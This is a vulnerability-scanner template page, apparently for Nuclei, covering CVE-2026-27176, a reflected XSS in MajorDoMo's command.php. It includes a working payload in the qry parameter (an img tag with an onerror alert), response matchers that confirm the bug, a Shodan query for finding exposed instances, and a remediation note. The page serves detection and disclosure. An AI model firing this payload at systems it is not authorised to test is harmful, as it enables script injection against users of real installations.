MajorDoMo - Cross-Site Scripting
CVE-2026-27176
Verified
Description
MajorDoMo contains a reflected XSS caused by unsanitized $qry parameter in command.php, letting attackers inject arbitrary JavaScript via crafted URLs, exploit requires victim to visit malicious URL.
Severity
Medium
CVSS Score
6.1
Exploit Probability
0%
Published Date
May 4, 2026
Template Author
dhiyaneshdk
CVE-2026-27176.yaml
id: CVE-2026-27176
info:
name: MajorDoMo - Cross-Site Scripting
author: DhiyaneshDk
severity: medium
description: |
MajorDoMo contains a reflected XSS caused by unsanitized $qry parameter in command.php, letting attackers inject arbitrary JavaScript via crafted URLs, exploit requires victim to visit malicious URL.
impact: |
Attackers can execute arbitrary JavaScript in victim's browser, leading to session hijacking or other client-side attacks.
remediation: |
Sanitize the $qry parameter using htmlspecialchars() or equivalent before rendering.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-27176
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2026-27176
epss-score: 0.00095
epss-percentile: 0.26165
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: html:"majordomo"
tags: cve,cve2026,xss,majordomo
http:
- method: GET
path:
- "{{BaseURL}}/command.php?qry=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><img src=x onerror=alert(document.domain)>'
- "Command:"
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100dee7f292e132a735583f856a1c08aab16d4985753ec455facad6c46d113407590220375ff28395fd430a8021f6e0dcae849f0ab5ff2b2fbb15e718ac1c514a8b392f:922c64590222798bb761d5b6d8e729506.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-27176
CWE ID:
cwe-79
Remediation Steps
Sanitize the $qry parameter using htmlspecialchars() or equivalent before rendering.